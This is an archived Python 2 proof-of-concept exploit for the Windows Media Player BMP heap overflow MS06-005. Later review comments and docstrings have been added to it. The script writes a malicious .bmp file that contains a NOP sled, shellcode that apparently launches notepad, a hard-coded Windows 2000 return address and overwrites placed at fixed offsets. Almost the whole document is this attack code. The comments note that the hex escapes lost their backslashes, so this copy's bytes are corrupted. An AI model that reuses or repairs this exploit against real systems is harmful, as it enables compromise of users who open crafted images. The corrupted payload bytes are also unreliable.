# Title : Windows Media Player 7.1 <= 10 BMP Heap Overflow PoC (MS06-005) (2)
# Published : 2006-02-16
# Author : redsand
# sploit creator by redsand@blacksecurity.org
# ms06-005 advisory proof of concept
# heap overflow in wmf.dll @ 0x0035920a
# denial of service, cuz we can't get this to play nice
#shamelessly stolen from CANVAS code
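def intel_order(i):
    """Pack the low 32 bits of integer ``i`` as a 4-character little-endian string.

    Each character is ``chr(byte)`` of successive 8-bit chunks, least
    significant first. Bits above bit 31 are discarded, and negative values
    wrap as two's complement (``intel_order(-1)`` is four 0xFF characters),
    matching the original shift-and-modulo implementation.

    Args:
        i: integer to pack.

    Returns:
        A 4-character ``str`` (a byte string under Python 2, which this
        script targets).
    """
    # The original kept a local named ``str``, shadowing the builtin; a
    # join over the four byte positions avoids that and the manual shifts.
    # ``& 0xFF`` equals ``% 256`` for every Python int, including negatives.
    return "".join(chr((i >> (8 * k)) & 0xFF) for k in range(4))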
def stroverwrite(instring, overwritestring, offset):
    """Return ``instring`` with ``overwritestring`` pasted in at ``offset``.

    The characters from ``offset`` up to ``offset + len(overwritestring)``
    are replaced; everything after that position is kept. No padding is
    inserted when ``offset`` lies beyond the end of ``instring`` -- the
    overwrite is then simply appended.

    Args:
        instring: source string.
        overwritestring: replacement text written at ``offset``.
        offset: byte index at which the replacement starts.

    Returns:
        The combined string.
    """
    end = offset + len(overwritestring)
    return "".join((instring[:offset], overwritestring, instring[end:]))
#options
#SEH Handle
#anything with a call/jmp edi/ecx + 4 or more
# NOTE(review): the script below is Python 2 (print statements, ``L`` long
# suffixes, str used as a byte string); it does not run unmodified on Python 3.
EIP=0x75e1692c # call edi +20 for win2k pro eng in oleaut
# EIP is a hard-coded absolute address; per the comment above it is only
# meaningful for the single Windows 2000 / oleaut build the author tested.
DUMMY=0xccccccccL  # never referenced anywhere below
filename = "rbl4ck-06-005.bmp"  # fixed output name; a static string worth searching for
# 'header' forms the start of the generated .bmp file.
# NOTE(review): the ``x..`` pairs in these literals look like hex escapes whose
# backslashes were lost when the page was archived; as written here they are
# plain ASCII characters, so this copy's output is not byte-identical to the
# original PoC.
header = "x42x4dx00x00x00x00x00x00x00x00x06x00x00x00x28x00"
header += "x00x00x01x00x00x00x01x00x00x00x01x00x04x00x00x00"
header += "x00x00x00x01x00x00x01x00x00x00x01x00x04x00x00x00"
header += "x00x00x00x00x00x00x00x00x00xCC"
# 'c0de' is the payload region: "x90" repeated 350 times, the escape-looking
# sequences below, a tag string, then 256 copies of EIP-80.
c0de = "x90" * 350
c0de += "xCDx03"
c0de += "xEBx61x56x6Ax30x59x64x8Bx01x8Bx40x0C"
c0de += "x8Bx70x1CxADx8Bx40x08x5ExC3x60x8Bx6C"
c0de += "x24x24x8Bx45x3Cx8Bx54x05x78x01xEAx8B"
c0de += "x4Ax18x8Bx5Ax20x01xEBxE3x34x49x8Bx34"
c0de += "x8Bx01xEEx31xFFx31xC0xFCxACx84xC0x74"
c0de += "x07xC1xCFx0Dx01xC7xEBxF4x3Bx7Cx24x28"
c0de += "x75xE1x8Bx5Ax24x01xEBx66x8Bx0Cx4Bx8B"
c0de += "x5Ax1Cx01xEBx8Bx04x8Bx01xE8x89x44x24"
c0de += "x1Cx61xC3xE8x9AxFFxFFxFFx68x98xFEx8A"
c0de += "x0Ex50xE8xA2xFFxFFxFFxEBx02xEBx05xE8"
c0de += "xF9xFFxFFxFFx5Bx83xC3x1Cx33xC9x88x0B"
c0de += "x83xEBx0Bx41x51x53xFFxD0x90x6Ex6Fx74"
c0de += "x65x70x61x64x2Ex65x78x65x01"
#tag
c0de += "0wn3dbyr3ds4nd"  # static marker present in every file this script writes
for on in range(256):
    c0de += intel_order(EIP-80)
# 'body' starts with 235 little-endian 32-bit counter values. r is incremented
# before it is packed, so the first value written is 0x88888801.
body = ""
r=0x88888800L
for on in range(235):
    r+=0x01L
    body += intel_order(r)
body += c0de
# Selected 4-byte words of body are then replaced with EIP-derived values at
# fixed byte offsets. At this point body is 235*4 = 940 bytes of counter
# values followed by c0de.
body = stroverwrite(body,intel_order(EIP-4),56)
body = stroverwrite(body,intel_order(EIP),96)
body = stroverwrite(body,intel_order(EIP),160)
body = stroverwrite(body,intel_order(EIP-0x3c),708)
body = stroverwrite(body,intel_order(EIP),828)
body = stroverwrite(body,intel_order(EIP),868)
body = stroverwrite(body,intel_order(EIP),936)
#
#here's our call eax+4
body = stroverwrite(body,intel_order(EIP-4),948)
#
#
body = stroverwrite(body,intel_order(EIP),300)
print "MS06-005 Heap Overflow by redsand [at] blacksecurity.org"
print "Writing filename " + filename + "..."
try:
    fsock = open(filename, "wb+", 0)  # unbuffered binary write of header + body
    try:
        fsock.write(header + body );
    finally:
        fsock.close()
except IOError:
    # NOTE(review): the IOError is swallowed, so "success." below is printed
    # even when the file could not be opened or written.
    pass
print "success."